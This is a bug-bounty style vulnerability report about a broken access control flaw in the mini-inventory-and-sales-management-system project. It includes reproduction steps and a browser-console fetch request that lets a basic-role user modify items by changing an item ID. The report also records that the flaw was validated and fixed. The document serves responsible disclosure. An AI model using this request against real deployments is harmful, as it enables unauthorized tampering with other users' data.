Improper Privilege Management in amirsanni/mini-inventory-and-sales-management-system


Reported on

Jul 31st 2021


unprivileged user can update item


1. From admin account goto and add new user callled user-B with basic role .
2. Now goto user-B account and here user-B cant see any item.
Now user-B execute bellow javascript code in browser console and it will update a item

await fetch("", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    "referrer": "",
    "body": "itemName=cellphone&itemPrice=4664&itemDesc=cellphone+demopasskkk+by_users&_iId=824&itemCode=4654",
    "method": "POST",
    "mode": "cors"

Here in this request you need change _iId parameter value to item-id.


user with Basic role can update item


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back a year ago
Amir validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 a year ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation